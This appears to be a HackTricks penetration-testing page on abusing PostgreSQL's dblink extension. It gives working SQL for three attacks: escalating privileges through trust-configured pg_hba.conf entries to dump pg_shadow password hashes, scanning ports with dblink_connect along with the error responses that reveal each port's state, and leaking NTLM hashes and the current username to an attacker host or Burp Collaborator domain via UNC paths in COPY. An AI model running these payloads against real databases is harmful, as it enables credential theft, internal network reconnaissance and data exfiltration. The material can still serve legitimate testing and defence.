6.3 KiB
Network - Privesc, Port Scanner and NTLM chanllenge response disclosure
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Find more information about these attacks in the original paper.
Since PostgreSQL 9.1, installation of additional modules is simple. Registered extensions like dblink
can be installed with CREATE EXTENSION
:
CREATE EXTENSION dblink;
Once you have dblink loaded you could be able to perform some interesting tricks:
Privilege Escalation
The file pg_hba.conf
could be bad configured allowing connections from localhost as any user without needing to know the password. This file could be typically found in /etc/postgresql/12/main/pg_hba.conf
and a bad configuration looks like:
local all all trust
Note that this configuration is commonly used to modify the password of a db user when the admin forget it, so sometimes you may find it.
&#xNAN;Note also that the file pg_hba.conf is readable only by postgres user and group and writable only by postgres user.
This case is useful if you already have a shell inside the victim as it will allow you to connect to postgresql database.
Another possible misconfiguration consist on something like this:
host all all 127.0.0.1/32 trust
As it will allow everybody from the localhost to connect to the database as any user.
In this case and if the dblink
function is working, you could escalate privileges by connecting to the database through an already established connection and access data shouldn't be able to access:
SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);
SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);
Port Scanning
Abusing dblink_connect
you could also search open ports. If that **function doesn't work you should try to use dblink_connect_u()
as the documentation says that dblink_connect_u()
is identical to dblink_connect()
, except that it will allow non-superusers to connect using any authentication method_.
SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR: could not establish connection
DETAIL: could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?
// Port Filtered/Timeout
ERROR: could not establish connection
DETAIL: timeout expired
// Accessing HTTP server
ERROR: could not establish connection
DETAIL: timeout expired
// Accessing HTTPS server
ERROR: could not establish connection
DETAIL: received invalid response to SSL negotiation:
Note that before being able to use dblink_connect
or dblink_connect_u
you may need to execute:
CREATE extension dblink;
UNC path - NTLM hash disclosure
-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';
-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.